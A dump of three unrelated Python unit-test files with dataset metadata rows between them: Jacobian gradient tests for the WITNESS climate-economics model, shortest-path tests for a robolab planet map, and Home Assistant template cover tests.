# for technology in full_values_dict[f'Test.WITNESS_Eval.EnergyMix.{energy}.technologies_list']:
# technology_wo_dot = technology.replace('.', '_')
# input_full_names.append(
# f'{self.name}.WITNESS_Eval.DesignVariables.{energy}.{technology}.{energy_wo_dot}_{technology_wo_dot}_array_mix')
self.check_jacobian(location=dirname(__file__), filename=f'jacobian_residus_wrt_design_var_on_witness_full.pkl', discipline=disc, inputs=[f'{namespace}.EnergyMix.electricity.CoalGen.electricity_CoalGen_array_mix',
f'{namespace}.EnergyMix.liquid_fuel.Refinery.liquid_fuel_Refinery_array_mix',
f'{namespace}.CO2_taxes_array'],
outputs=output_full_names, derr_approx='complex_step', step=1.0e-15, parallel=True)
def test_04_gradient_objective_wrt_design_var_on_witness_full(self):
self.name = 'Test'
self.ee = ExecutionEngine(self.name)
builder = self.ee.factory.get_builder_from_process(
'climateeconomics.sos_processes.iam.witness', 'witness_optim_sub_process')
self.ee.factory.set_builders_to_coupling_builder(builder)
self.ee.configure()
usecase = witness_sub_proc_usecase(execution_engine=self.ee)
usecase.study_name = self.name
values_dict = usecase.setup_usecase()
full_values_dict = {}
for dict_v in values_dict:
full_values_dict.update(dict_v)
full_values_dict['Test.epsilon0'] = 1.0
# 1.0e-12
full_values_dict['Test.WITNESS_Eval.tolerance_linear_solver_MDO'] = 1.0e-8
full_values_dict['Test.WITNESS_Eval.linearization_mode'] = 'adjoint'
full_values_dict['Test.WITNESS_Eval.tolerance'] = 1.0e-10
full_values_dict['Test.WITNESS_Eval.warm_start'] = False
full_values_dict['Test.WITNESS_Eval.sub_mda_class'] = 'MDAGaussSeidel'
self.ee.load_study_from_input_dict(full_values_dict)
disc = self.ee.root_process.sos_disciplines[0]
output_full_names = [
f'Test.WITNESS_Eval.{obj}' for obj in self.obj_const]
input_full_names = ['Test.WITNESS_Eval.CO2_taxes_array']
for energy in full_values_dict[f'{self.name}.WITNESS_Eval.energy_list']:
energy_wo_dot = energy.replace('.', '_')
input_full_names.append(
f'{self.name}.WITNESS_Eval.DesignVariables.{energy}.{energy_wo_dot}_array_mix')
# for technology in full_values_dict[f'Test.WITNESS_Eval.EnergyMix.{energy}.technologies_list']:
# technology_wo_dot = technology.replace('.', '_')
# input_full_names.append(
# f'{self.name}.WITNESS_Eval.DesignVariables.{energy}.{technology}.{energy_wo_dot}_{technology_wo_dot}_array_mix')
self.check_jacobian(location=dirname(__file__), filename=f'jacobian_objective_wrt_design_var_on_witness_full.pkl', discipline=disc,
step=1.0e-15, derr_approx='complex_step', threshold=1e-5,
inputs=input_full_names,
outputs=output_full_names, parallel=True)
def test_05_adjoint_with_bsplines(self):
self.name = 'Test'
self.ee = ExecutionEngine(self.name)
coupling_name = "WITNESS_Eval"
designvariable_name = "DesignVariables"
extra_name = 'WITNESS'
# retrieve energy process
chain_builders = self.ee.factory.get_builder_from_process(
'climateeconomics.sos_processes.iam.witness', 'witness')
# modify namespaces defined in the child process
self.ee.ns_manager.update_namespace_list_with_extra_ns(
extra_name, after_name=self.ee.study_name)
self.ee.factory.update_builder_list_with_extra_name(
extra_name, builder_list=chain_builders)
# design variables builder
design_var_path = 'climateeconomics.core.design_variables_translation.witness_bspline.design_var_disc.Design_Var_Discipline'
design_var_builder = self.ee.factory.get_builder_from_module(
f'{designvariable_name}', design_var_path)
chain_builders.append(design_var_builder)
# # function manager builder
# fmanager_path = 'sos_trades_core.execution_engine.func_manager.func_manager_disc.FunctionManagerDisc'
# fmanager_builder = self.ee.factory.get_builder_from_module(
# f'{func_manager_name}', fmanager_path)
# chain_builders.append(fmanager_builder)
# modify namespaces defined in the child process
for ns in self.ee.ns_manager.ns_list:
self.ee.ns_manager.update_namespace_with_extra_ns(
ns, coupling_name, after_name=self.ee.study_name)
ns_dict = {'ns_functions': f'{self.ee.study_name}.{coupling_name}.{extra_name}',
'ns_public': f'{self.ee.study_name}',
'ns_optim': f'{self.ee.study_name}'}
self.ee.ns_manager.add_ns_def(ns_dict)
# create coupling builder
coupling_builder = self.ee.factory.create_builder_coupling(
coupling_name)
coupling_builder.set_builder_info('cls_builder', chain_builders)
coupling_builder.set_builder_info('with_data_io', True)
self.ee.factory.set_builders_to_coupling_builder(coupling_builder)
self.ee.configure()
usecase = witness_sub_proc_usecase(execution_engine=self.ee)
usecase.study_name = self.name
values_dict = usecase.setup_usecase()
full_values_dict = {}
for dict_v in values_dict:
full_values_dict.update(dict_v)
full_values_dict[f'{usecase.study_name}.WITNESS_Eval.linear_solver_MDO_options'] = {'tol': 1.0e-14,
'max_iter': 50000}
full_values_dict[f'{usecase.study_name}.WITNESS_Eval.linear_solver_MDA_options'] = {'tol': 1.0e-14,
'max_iter': 50000}
full_values_dict[f'{usecase.study_name}.WITNESS_Eval.linearization_mode'] = 'adjoint'
full_values_dict[f'{usecase.study_name}.WITNESS_Eval.tolerance'] = 1.0e-12
full_values_dict[f'{usecase.study_name}.WITNESS_Eval.max_mda_iter'] = 200
full_values_dict[f'{usecase.study_name}.WITNESS_Eval.sub_mda_class'] = 'MDAGaussSeidel'
input_full_names = ['Test.WITNESS_Eval.WITNESS.CO2_taxes_array']
nb_poles = 5
for energy in full_values_dict[f'{self.name}.WITNESS_Eval.WITNESS.energy_list']:
energy_wo_dot = energy.replace('.', '_')
input_name = f'{self.name}.WITNESS_Eval.WITNESS.EnergyMix.{energy}.{energy_wo_dot}_array_mix'
input_full_names.append(input_name)
full_values_dict[input_name] = np.linspace(1, 2, nb_poles)
for technology in full_values_dict[f'{self.name}.WITNESS_Eval.WITNESS.EnergyMix.{energy}.technologies_list']:
technology_wo_dot = technology.replace('.', '_')
input_name = f'{self.name}.WITNESS_Eval.WITNESS.EnergyMix.{energy}.{technology}.{energy_wo_dot}_{technology_wo_dot}_array_mix'
input_full_names.append(input_name)
full_values_dict[input_name] = np.linspace(3, 4, nb_poles)
self.ee.load_study_from_input_dict(full_values_dict)
disc = self.ee.root_process.sos_disciplines[0]
namespace = 'Test.WITNESS_Eval.WITNESS'
output_full_names = [f'{namespace}.temperature_df', f'{namespace}.utility_df', f'{namespace}.economics_df',
f'{namespace}.carboncycle_df', f'{namespace}.CO2_emissions_df', f'{namespace}.damage_df',
f'{namespace}.EnergyMix.energy_production', f'{namespace}.EnergyMix.energy_investment',
f'{namespace}.EnergyMix.co2_emissions_Gt', f'{namespace}.EnergyMix.energy_mean_price',
f'{namespace}.CO2_objective', f'{namespace}.ppm_objective', f'{namespace}.utility_objective',
f'{namespace}.temperature_objective', f'{namespace}.CO2_tax_minus_CO2_damage_constraint_df', f'{namespace}.CO2_tax_minus_CCS_constraint_df']
self.ee.display_treeview_nodes(display_variables=True)
self.check_jacobian(location=dirname(__file__), filename=f'jacobian_adjoint_with_bsplines_witness_full.pkl', discipline=disc, inputs=input_full_names,
outputs=output_full_names, derr_approx='complex_step', step=1.0e-15, parallel=True)
if '__main__' == __name__:
cls = WitnessFullJacobianDiscTest()
cls.test_05_adjoint_with_bsplines()
| 51.710456
| 237
| 0.669484
| 2,375
| 19,288
| 5.045474
| 0.112842
| 0.036552
| 0.040891
| 0.022532
| 0.858466
| 0.846533
| 0.829926
| 0.811817
| 0.798047
| 0.777101
| 0
| 0.011335
| 0.231595
| 19,288
| 372
| 238
| 51.849462
| 0.79718
| 0.141124
| 0
| 0.708333
| 0
| 0.004167
| 0.292875
| 0.233004
| 0
| 0
| 0
| 0
| 0
| 1
| 0.029167
| false
| 0
| 0.025
| 0.004167
| 0.066667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b74fa469cc23fa734f42613a3cb5f1997f47ba8a
| 13,639
|
py
|
Python
|
src/planettest.py
|
tillgr/robolab
|
67acad1ba7731c69b113a93ab737a4389e3e62cf
|
[
"MIT"
] | null | null | null |
src/planettest.py
|
tillgr/robolab
|
67acad1ba7731c69b113a93ab737a4389e3e62cf
|
[
"MIT"
] | null | null | null |
src/planettest.py
|
tillgr/robolab
|
67acad1ba7731c69b113a93ab737a4389e3e62cf
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import unittest
from planet import Direction, Planet
import pprint
class ExampleTestPlanet(unittest.TestCase):
def setUp(self):
"""
Instantiates the planet data structure and fills it with paths
example planet:
+--+
| |
+-0,3------+
| |
0,2-----2,2 (target)
| /
+-0,1 /
| | /
+-0,0-1,0
|
(start)
"""
# set your data structure
self.planet = Planet()
# add the paths
self.planet.add_path(((0, 0), Direction.NORTH), ((0, 1), Direction.SOUTH), 1)
self.planet.add_path(((0, 1), Direction.WEST), ((0, 0), Direction.WEST), 1)
#def test_target_not_reachable_with_loop(self):
# does the shortest path algorithm loop infinitely?
# there is no shortest path
# self.assertIsNone(self.planet.shortest_path((0, 0), (1, 2)))
class YourFirstTestPlanet(unittest.TestCase):
def setUp(self):
"""
Planet:
+--+
| |
+-0,3------+
| |
0,2-----2,2 (target)
| /
+-0,1 /
| | /
+-0,0-1,0
|
(start)
Instantiates the planet data structure and fills it with paths
MODEL YOUR TEST PLANET HERE (if you'd like):
"""
# set your data structure
self.planet = Planet()
# ADD YOUR PATHS HERE:
# self.planet.add_path(...)
'''
self.planet.add_path(((0, 0), Direction.NORTH), ((0, 1), Direction.SOUTH), 1)
self.planet.add_path(((0, 0), Direction.WEST), ((0, 1), Direction.WEST), 2)
self.planet.add_path(((0, 0), Direction.EAST), ((1, 0), Direction.WEST), 1)
self.planet.add_path(((0, 1), Direction.NORTH), ((0, 2), Direction.SOUTH), 1)
self.planet.add_path(((0, 2), Direction.NORTH), ((0, 3), Direction.SOUTH), 1)
self.planet.add_path(((0, 2), Direction.EAST), ((2, 2), Direction.WEST), 2)
self.planet.add_path(((0, 3), Direction.NORTH), ((0, 3), Direction.WEST), 2)
self.planet.add_path(((0, 3), Direction.EAST), ((2, 2), Direction.NORTH), 3)
self.planet.add_path(((1, 0), Direction.NORTH), ((2, 2), Direction.SOUTH), 3)
'''
def test_add_paths(self):
self.planet.add_path(((0, 0), Direction.NORTH), ((0, 1), Direction.SOUTH), 1)
self.planet.add_path(((0, 0), Direction.WEST), ((0, 1), Direction.WEST), 2)
self.planet.add_path(((0, 0), Direction.EAST), ((1, 0), Direction.WEST), 1)
self.planet.add_path(((0, 1), Direction.NORTH), ((0, 2), Direction.SOUTH), 1)
self.planet.add_path(((0, 2), Direction.NORTH), ((0, 3), Direction.SOUTH), 1)
self.planet.add_path(((0, 2), Direction.EAST), ((2, 2), Direction.WEST), 2)
self.planet.add_path(((0, 3), Direction.NORTH), ((0, 3), Direction.WEST), 2)
self.planet.add_path(((0, 3), Direction.EAST), ((2, 2), Direction.NORTH), 3)
self.planet.add_path(((1, 0), Direction.NORTH), ((2, 2), Direction.SOUTH), 3)
pprint.pprint(self.planet.planetKarte)
def test_get_paths(self):
self.planet.get_paths()
pprint.pprint(self.planet.planetPaths)
"""
print(sorted(self.planet.planetPaths))
print(list(range(0,10)))
l = [(1, 5),(2,5),(3,5)]
for k,v in l:
print(k, v)
for s,v, in self.planet.planetPaths.items():
print("!")
print(s)
#print(v)
for k,v in self.planet.planetPaths.get(s).items():
print(s, v[0], v[2])
#print(v)
"""
def test_integrity(self):
# were all paths added correctly to the planet
# check if add_path() works by using get_paths()
self.assertEqual(self.planet.get_paths(),
{(0, 0): { Direction.NORTH : ((0, 1), Direction.SOUTH , 1),
Direction.EAST : ((1, 0), Direction.WEST , 1),
Direction.WEST : ((0, 1), Direction.WEST , 2)},
(0, 1): { Direction.NORTH : ((0, 2), Direction.SOUTH , 1),
Direction.SOUTH : ((0, 0), Direction.NORTH , 1),
Direction.WEST : ((0, 0), Direction.WEST , 2)},
(0, 2): { Direction.NORTH : ((0, 3), Direction.SOUTH , 1),
Direction.EAST : ((2, 2), Direction.WEST , 2),
Direction.SOUTH: ((0, 1), Direction.NORTH, 1)},
(0, 3): { Direction.NORTH : ((0, 3), Direction.WEST , 2),
Direction.EAST: ((2, 2), Direction.NORTH , 3),
Direction.SOUTH : ((0, 2), Direction.NORTH , 1),
Direction.WEST: ((0, 3), Direction.NORTH , 2)},
(1, 0): { Direction.NORTH: ((2, 2), Direction.SOUTH , 3),
Direction.WEST : ((0, 0), Direction.EAST , 1)},
(2, 2): { Direction.NORTH : ((0, 3), Direction.EAST , 3),
Direction.SOUTH : ((1, 0), Direction.NORTH , 3),
Direction.WEST : ((0, 2), Direction.EAST, 2)}})
#self.fail('implement me!')
def test_empty_planet(self):
self.assertEqual(self.planet.shortest_path((0, 0), (1, 2)), [])
def test_target_not_reachable(self):
self.planet.add_path(((0, 0), Direction.NORTH), ((0, 1), Direction.SOUTH), 1)
self.planet.add_path(((0, 0), Direction.WEST), ((0, 1), Direction.WEST), 2)
self.planet.add_path(((0, 0), Direction.EAST), ((1, 0), Direction.WEST), 1)
self.planet.add_path(((0, 1), Direction.NORTH), ((0, 2), Direction.SOUTH), 1)
self.planet.add_path(((0, 2), Direction.NORTH), ((0, 3), Direction.SOUTH), 1)
self.planet.add_path(((0, 2), Direction.EAST), ((2, 2), Direction.WEST), 2)
self.planet.add_path(((0, 3), Direction.NORTH), ((0, 3), Direction.WEST), 2)
self.planet.add_path(((0, 3), Direction.EAST), ((2, 2), Direction.NORTH), 3)
self.planet.add_path(((1, 0), Direction.NORTH), ((2, 2), Direction.SOUTH), 3)
self.assertEqual(self.planet.shortest_path((0, 0), (1, 2)), [])
#self.fail('implement me!')
def test_shortest_path(self):
# at least 2 possible paths
self.planet.add_path(((0, 0), Direction.NORTH), ((0, 1), Direction.SOUTH), 1)
self.planet.add_path(((0, 0), Direction.WEST), ((0, 1), Direction.WEST), 2)
self.planet.add_path(((0, 0), Direction.EAST), ((1, 0), Direction.WEST), 1)
self.planet.add_path(((0, 1), Direction.NORTH), ((0, 2), Direction.SOUTH), 2)
self.planet.add_path(((0, 2), Direction.NORTH), ((0, 3), Direction.SOUTH), 1)
self.planet.add_path(((0, 2), Direction.EAST), ((2, 2), Direction.WEST), 2)
self.planet.add_path(((0, 3), Direction.NORTH), ((0, 3), Direction.WEST), 2)
self.planet.add_path(((0, 3), Direction.EAST), ((2, 2), Direction.NORTH), 3)
self.planet.add_path(((1, 0), Direction.NORTH), ((2, 2), Direction.SOUTH), 3)
#self.planet.get_paths()
self.assertEqual(self.planet.shortest_path((0, 0), (2, 2)), [((0, 0), Direction.EAST), ((1, 0), Direction.NORTH)])
#print(self.planet.planetPaths.items())
#self.fail('implement me!')
def test_same_length(self):
# at least 2 possible paths with the same weight
self.planet.add_path(((0, 0), Direction.NORTH), ((0, 1), Direction.SOUTH), 1)
self.planet.add_path(((0, 0), Direction.WEST), ((0, 1), Direction.WEST), 2)
self.planet.add_path(((0, 0), Direction.EAST), ((1, 0), Direction.WEST), 1)
self.planet.add_path(((0, 1), Direction.NORTH), ((0, 2), Direction.SOUTH), 1)
self.planet.add_path(((0, 2), Direction.NORTH), ((0, 3), Direction.SOUTH), 1)
self.planet.add_path(((0, 2), Direction.EAST), ((2, 2), Direction.WEST), 2)
self.planet.add_path(((0, 3), Direction.NORTH), ((0, 3), Direction.WEST), 2)
self.planet.add_path(((0, 3), Direction.EAST), ((2, 2), Direction.NORTH), 3)
self.planet.add_path(((1, 0), Direction.NORTH), ((2, 2), Direction.SOUTH), 4)
self.assertEqual(self.planet.shortest_path((0,0),(2,2,)), ([((0,0), 0), ((0,1), 0), ((0,2), 90)] or [((0,0), 90), ((1,0), 0)]))
#self.fail('implement me!')
def test_shortest_path_with_loop(self):
# does the shortest path algorithm loop infinitely?
# there is a shortest path
self.planet.add_path(((0, 0), Direction.NORTH), ((0, 1), Direction.SOUTH), 1)
self.planet.add_path(((0, 0), Direction.WEST), ((0, 1), Direction.WEST), 2)
self.planet.add_path(((0, 0), Direction.EAST), ((1, 0), Direction.WEST), 1)
self.planet.add_path(((0, 1), Direction.NORTH), ((0, 2), Direction.SOUTH), 1)
self.planet.add_path(((0, 2), Direction.NORTH), ((0, 3), Direction.SOUTH), 1)
self.planet.add_path(((0, 2), Direction.EAST), ((2, 2), Direction.WEST), 5)
self.planet.add_path(((0, 3), Direction.NORTH), ((0, 3), Direction.WEST), 2)
self.planet.add_path(((0, 3), Direction.EAST), ((2, 2), Direction.NORTH), 3)
self.planet.add_path(((1, 0), Direction.NORTH), ((2, 2), Direction.SOUTH), 3)
self.assertEqual(self.planet.shortest_path((0,2),(2,2,)), [((0,2), 0), ((0,3), 90)])
#self.fail('implement me!')
def test_target_not_reachable_with_loop(self):
#there is no shortest path
self.planet.add_path(((0, 0), Direction.NORTH), ((0, 1), Direction.SOUTH), 1)
self.planet.add_path(((0, 1), Direction.EAST), ((1, 1), Direction.WEST), 1)
self.planet.add_path(((0, 0), Direction.WEST), ((1, 0), Direction.EAST), 1)
self.planet.add_path(((1, 0), Direction.NORTH), ((1,1), Direction.SOUTH), 1)
self.planet.add_path(((0, 0), Direction.NORTH), ((1,1), Direction.SOUTH), 2)
self.planet.add_path(((0, 1), Direction.EAST), ((1, 0), Direction.WEST), 2)
self.planet.add_path(((0,0), Direction.WEST), ((0,0), Direction.NORTH), 1)
self.assertEqual(self.planet.shortest_path((0, 0), (5,5)), [])
#self.fail('implement me!')
def test_target_not_reacheable_blocked(self):
self.planet.add_path(((0, 0), Direction.NORTH), ((0, 1), Direction.SOUTH), 1)
self.planet.add_path(((0, 0), Direction.WEST), ((0, 1), Direction.WEST), 2)
self.planet.add_path(((0, 0), Direction.EAST), ((1, 0), Direction.WEST), 1)
self.planet.add_path(((0, 1), Direction.NORTH), ((0, 2), Direction.SOUTH), 1)
self.planet.add_path(((0, 2), Direction.NORTH), ((0, 3), Direction.SOUTH), -1)
self.planet.add_path(((0, 2), Direction.EAST), ((2, 2), Direction.WEST), 2)
#self.planet.add_path(((0, 3), Direction.NORTH), ((0, 3), Direction.WEST), 2)
#self.planet.add_path(((0, 3), Direction.EAST), ((2, 2), Direction.NORTH), 3)
self.planet.add_path(((1, 0), Direction.NORTH), ((2, 2), Direction.SOUTH), 3)
self.assertEqual(self.planet.shortest_path((0, 0), (0,3)), [])
def test_target_not_reacheable_blocked_with_loop(self):
self.planet.add_path(((0, 0), Direction.NORTH), ((0, 1), Direction.SOUTH), 1)
self.planet.add_path(((0, 0), Direction.WEST), ((0, 1), Direction.WEST), 2)
self.planet.add_path(((0, 0), Direction.EAST), ((1, 0), Direction.WEST), 1)
self.planet.add_path(((0, 1), Direction.NORTH), ((0, 2), Direction.SOUTH), 1)
self.planet.add_path(((0, 2), Direction.NORTH), ((0, 3), Direction.SOUTH), -1)
self.planet.add_path(((0, 2), Direction.EAST), ((2, 2), Direction.WEST), 2)
self.planet.add_path(((0, 0), Direction.NORTH), ((0, 0), Direction.WEST), 1)
# self.planet.add_path(((0, 3), Direction.EAST), ((2, 2), Direction.NORTH), 3)
self.planet.add_path(((1, 0), Direction.NORTH), ((2, 2), Direction.SOUTH), 3)
self.assertEqual(self.planet.shortest_path((0, 0), (0, 3)), [])
pass
def test_shortest_path_with_blocked(self):
self.planet.add_path(((0, 0), Direction.NORTH), ((0, 1), Direction.SOUTH), 1)
self.planet.add_path(((0, 0), Direction.WEST), ((0, 1), Direction.WEST), 2)
self.planet.add_path(((0, 0), Direction.EAST), ((1, 0), Direction.WEST), -1)
self.planet.add_path(((0, 1), Direction.NORTH), ((0, 2), Direction.SOUTH), -1)
self.planet.add_path(((0, 2), Direction.NORTH), ((0, 3), Direction.SOUTH), 1)
self.planet.add_path(((0, 2), Direction.EAST), ((2, 2), Direction.WEST), 2)
self.planet.add_path(((0, 3), Direction.NORTH), ((0, 3), Direction.WEST), 2)
self.planet.add_path(((0, 3), Direction.EAST), ((2, 2), Direction.NORTH), 3)
self.planet.add_path(((1, 0), Direction.NORTH), ((2, 2), Direction.SOUTH), 3)
pass
def test_add_path_twice(self):
# at least 2 possible paths
self.planet.add_path(((0, 0), Direction.NORTH), ((0, 1), Direction.SOUTH), -1)
self.planet.add_path(((0, 0), Direction.WEST), ((0, 1), Direction.WEST), 2)
self.assertEqual(self.planet.planetPaths, self.planet.get_paths())
# self.planet.get_paths()
print(self.planet.planetPaths)
def test_add_path_bidirectional(self):
self.planet.add_path(((0, 0), Direction.WEST), ((0, 1), Direction.WEST), 2)
map_test = {(0,0):{Direction.WEST: ((0,1), Direction.WEST, 2)},
(0,1): {Direction.WEST: ((0,0), Direction.WEST, 2)}
}
self.assertEqual(self.planet.get_paths(), map_test)
pass
if __name__ == "__main__":
unittest.main()
| 48.537367
| 135
| 0.559425
| 1,899
| 13,639
| 3.92891
| 0.056872
| 0.160836
| 0.163785
| 0.21418
| 0.875084
| 0.842246
| 0.809141
| 0.783809
| 0.720145
| 0.686369
| 0
| 0.061977
| 0.238141
| 13,639
| 280
| 136
| 48.710714
| 0.656049
| 0.113645
| 0
| 0.537931
| 0
| 0
| 0.000754
| 0
| 0
| 0
| 0
| 0
| 0.075862
| 1
| 0.110345
| false
| 0.02069
| 0.02069
| 0
| 0.144828
| 0.027586
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b786b463dadbabdac6a3dd8afcda884ea3a1cb95
| 27,707
|
py
|
Python
|
tests/components/cover/test_template.py
|
robin13/home-assistant
|
4976569e304c23975d34ec88e2dfb94e84ab1f1c
|
[
"Apache-2.0"
] | 37
|
2018-05-22T07:17:26.000Z
|
2022-03-03T13:14:46.000Z
|
tests/components/cover/test_template.py
|
robin13/home-assistant
|
4976569e304c23975d34ec88e2dfb94e84ab1f1c
|
[
"Apache-2.0"
] | 125
|
2018-12-11T07:31:20.000Z
|
2021-07-27T08:20:03.000Z
|
tests/components/cover/test_template.py
|
robin13/home-assistant
|
4976569e304c23975d34ec88e2dfb94e84ab1f1c
|
[
"Apache-2.0"
] | 8
|
2018-05-30T20:05:26.000Z
|
2021-02-19T14:17:05.000Z
|
"""The tests the cover command line platform."""
import logging
import unittest
from homeassistant.core import callback
from homeassistant import setup
import homeassistant.components.cover as cover
from homeassistant.const import STATE_OPEN, STATE_CLOSED
from tests.common import (
get_test_home_assistant, assert_setup_component)
_LOGGER = logging.getLogger(__name__)
class TestTemplateCover(unittest.TestCase):
"""Test the cover command line platform."""
hass = None
calls = None
# pylint: disable=invalid-name
def setup_method(self, method):
"""Initialize services when tests are started."""
self.hass = get_test_home_assistant()
self.calls = []
@callback
def record_call(service):
"""Track function calls.."""
self.calls.append(service)
self.hass.services.register('test', 'automation', record_call)
def teardown_method(self, method):
"""Stop everything that was started."""
self.hass.stop()
def test_template_state_text(self):
"""Test the state text of a template."""
with assert_setup_component(1, 'cover'):
assert setup.setup_component(self.hass, 'cover', {
'cover': {
'platform': 'template',
'covers': {
'test_template_cover': {
'value_template':
"{{ states.cover.test_state.state }}",
'open_cover': {
'service': 'cover.open_cover',
'entity_id': 'cover.test_state'
},
'close_cover': {
'service': 'cover.close_cover',
'entity_id': 'cover.test_state'
},
}
}
}
})
self.hass.start()
self.hass.block_till_done()
state = self.hass.states.set('cover.test_state', STATE_OPEN)
self.hass.block_till_done()
state = self.hass.states.get('cover.test_template_cover')
assert state.state == STATE_OPEN
state = self.hass.states.set('cover.test_state', STATE_CLOSED)
self.hass.block_till_done()
state = self.hass.states.get('cover.test_template_cover')
assert state.state == STATE_CLOSED
def test_template_state_boolean(self):
"""Test the value_template attribute."""
with assert_setup_component(1, 'cover'):
assert setup.setup_component(self.hass, 'cover', {
'cover': {
'platform': 'template',
'covers': {
'test_template_cover': {
'value_template':
"{{ 1 == 1 }}",
'open_cover': {
'service': 'cover.open_cover',
'entity_id': 'cover.test_state'
},
'close_cover': {
'service': 'cover.close_cover',
'entity_id': 'cover.test_state'
},
}
}
}
})
self.hass.start()
self.hass.block_till_done()
state = self.hass.states.get('cover.test_template_cover')
assert state.state == STATE_OPEN
def test_template_position(self):
"""Test the position_template attribute."""
with assert_setup_component(1, 'cover'):
assert setup.setup_component(self.hass, 'cover', {
'cover': {
'platform': 'template',
'covers': {
'test_template_cover': {
'position_template':
"{{ states.cover.test.attributes.position }}",
'open_cover': {
'service': 'cover.open_cover',
'entity_id': 'cover.test'
},
'close_cover': {
'service': 'cover.close_cover',
'entity_id': 'cover.test'
},
}
}
}
})
self.hass.start()
self.hass.block_till_done()
state = self.hass.states.set('cover.test', STATE_CLOSED)
self.hass.block_till_done()
entity = self.hass.states.get('cover.test')
attrs = dict()
attrs['position'] = 42
self.hass.states.set(
entity.entity_id, entity.state,
attributes=attrs)
self.hass.block_till_done()
state = self.hass.states.get('cover.test_template_cover')
assert state.attributes.get('current_position') == 42.0
assert state.state == STATE_OPEN
state = self.hass.states.set('cover.test', STATE_OPEN)
self.hass.block_till_done()
entity = self.hass.states.get('cover.test')
attrs['position'] = 0.0
self.hass.states.set(
entity.entity_id, entity.state,
attributes=attrs)
self.hass.block_till_done()
state = self.hass.states.get('cover.test_template_cover')
assert state.attributes.get('current_position') == 0.0
assert state.state == STATE_CLOSED
def test_template_tilt(self):
"""Test the tilt_template attribute."""
with assert_setup_component(1, 'cover'):
assert setup.setup_component(self.hass, 'cover', {
'cover': {
'platform': 'template',
'covers': {
'test_template_cover': {
'value_template':
"{{ 1 == 1 }}",
'tilt_template':
"{{ 42 }}",
'open_cover': {
'service': 'cover.open_cover',
'entity_id': 'cover.test_state'
},
'close_cover': {
'service': 'cover.close_cover',
'entity_id': 'cover.test_state'
},
}
}
}
})
self.hass.start()
self.hass.block_till_done()
state = self.hass.states.get('cover.test_template_cover')
assert state.attributes.get('current_tilt_position') == 42.0
def test_template_out_of_bounds(self):
"""Test template out-of-bounds condition."""
with assert_setup_component(1, 'cover'):
assert setup.setup_component(self.hass, 'cover', {
'cover': {
'platform': 'template',
'covers': {
'test_template_cover': {
'position_template':
"{{ -1 }}",
'tilt_template':
"{{ 110 }}",
'open_cover': {
'service': 'cover.open_cover',
'entity_id': 'cover.test_state'
},
'close_cover': {
'service': 'cover.close_cover',
'entity_id': 'cover.test_state'
},
}
}
}
})
self.hass.start()
self.hass.block_till_done()
state = self.hass.states.get('cover.test_template_cover')
assert state.attributes.get('current_tilt_position') is None
assert state.attributes.get('current_position') is None
def test_template_mutex(self):
"""Test that only value or position template can be used."""
with assert_setup_component(0, 'cover'):
assert setup.setup_component(self.hass, 'cover', {
'cover': {
'platform': 'template',
'covers': {
'test_template_cover': {
'value_template':
"{{ 1 == 1 }}",
'position_template':
"{{ 42 }}",
'open_cover': {
'service': 'cover.open_cover',
'entity_id': 'cover.test_state'
},
'close_cover': {
'service': 'cover.close_cover',
'entity_id': 'cover.test_state'
},
'icon_template':
"{% if states.cover.test_state.state %}"
"mdi:check"
"{% endif %}"
}
}
}
})
self.hass.start()
self.hass.block_till_done()
assert self.hass.states.all() == []
def test_template_open_or_position(self):
"""Test that at least one of open_cover or set_position is used."""
with assert_setup_component(1, 'cover'):
assert setup.setup_component(self.hass, 'cover', {
'cover': {
'platform': 'template',
'covers': {
'test_template_cover': {
'value_template':
"{{ 1 == 1 }}",
}
}
}
})
self.hass.start()
self.hass.block_till_done()
assert self.hass.states.all() == []
def test_template_open_and_close(self):
"""Test that if open_cover is specified, close_cover is too."""
with assert_setup_component(0, 'cover'):
assert setup.setup_component(self.hass, 'cover', {
'cover': {
'platform': 'template',
'covers': {
'test_template_cover': {
'value_template':
"{{ 1 == 1 }}",
'open_cover': {
'service': 'cover.open_cover',
'entity_id': 'cover.test_state'
},
},
}
}
})
self.hass.start()
self.hass.block_till_done()
assert self.hass.states.all() == []
def test_template_non_numeric(self):
"""Test that tilt_template values are numeric."""
with assert_setup_component(1, 'cover'):
assert setup.setup_component(self.hass, 'cover', {
'cover': {
'platform': 'template',
'covers': {
'test_template_cover': {
'position_template':
"{{ on }}",
'tilt_template':
"{% if states.cover.test_state.state %}"
"on"
"{% else %}"
"off"
"{% endif %}",
'open_cover': {
'service': 'cover.open_cover',
'entity_id': 'cover.test_state'
},
'close_cover': {
'service': 'cover.close_cover',
'entity_id': 'cover.test_state'
},
}
}
}
})
self.hass.start()
self.hass.block_till_done()
state = self.hass.states.get('cover.test_template_cover')
assert state.attributes.get('current_tilt_position') is None
assert state.attributes.get('current_position') is None
def test_open_action(self):
"""Test the open_cover command."""
with assert_setup_component(1, 'cover'):
assert setup.setup_component(self.hass, 'cover', {
'cover': {
'platform': 'template',
'covers': {
'test_template_cover': {
'position_template':
"{{ 0 }}",
'open_cover': {
'service': 'test.automation',
},
'close_cover': {
'service': 'cover.close_cover',
'entity_id': 'cover.test_state'
},
}
}
}
})
self.hass.start()
self.hass.block_till_done()
state = self.hass.states.get('cover.test_template_cover')
assert state.state == STATE_CLOSED
cover.open_cover(self.hass, 'cover.test_template_cover')
self.hass.block_till_done()
assert len(self.calls) == 1
def test_close_stop_action(self):
"""Test the close-cover and stop_cover commands."""
with assert_setup_component(1, 'cover'):
assert setup.setup_component(self.hass, 'cover', {
'cover': {
'platform': 'template',
'covers': {
'test_template_cover': {
'position_template':
"{{ 100 }}",
'open_cover': {
'service': 'cover.open_cover',
'entity_id': 'cover.test_state'
},
'close_cover': {
'service': 'test.automation',
},
'stop_cover': {
'service': 'test.automation',
},
}
}
}
})
self.hass.start()
self.hass.block_till_done()
state = self.hass.states.get('cover.test_template_cover')
assert state.state == STATE_OPEN
